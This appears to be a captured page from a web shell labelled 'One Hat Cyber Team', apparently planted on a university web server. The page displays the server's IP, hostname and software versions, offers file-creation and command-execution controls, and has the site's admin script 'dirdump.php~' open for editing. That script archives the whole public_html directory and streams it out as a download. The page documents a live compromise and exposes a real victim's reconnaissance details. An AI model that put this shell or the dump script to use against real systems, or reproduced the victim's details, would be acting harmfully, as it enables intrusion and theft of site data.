One Hat Cyber Team
Your IP :
216.73.216.24
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nosc
/
public_html
/
admin
/
Edit File:
dirdump.php~
<? $page_title="Directory structure dump"; $related_page="index.php"; require_once("../auth/auth.php"); // Unlimited execution, as long as it takes to DL set_time_limit(0); $filename = $_db_host."_".$_database."_".date("Y-M-d_H:i"); // Make it safe $filename = escapeshellarg($filename); // For proper browser handling header('Content-type: application/x-tar-gz'); header('Content-Disposition: attachment; filename="' . $filename . '.tar.gz"'); // the C argument is so that doesn't get included in your tarball extraction $cmd = "tar cfpz - /home/nosc/public_html"; //$cmd = "tar cf - /home/nosc/public_html | (cd /tmp ; tar xfp - )"; $fh = popen($cmd, 'rb'); while (!feof($fh)) { print fread($fh, 8192); } pclose($fh); /*$fp = fopen($filename, 'rb'); fpassthru($fp); unlink($dump);*/ /*header("Content-Length: ".filesize($dump)); $fp = fopen($dump, 'rb'); fpassthru($fp); unlink($dump);*/ exit; ?>
Simpan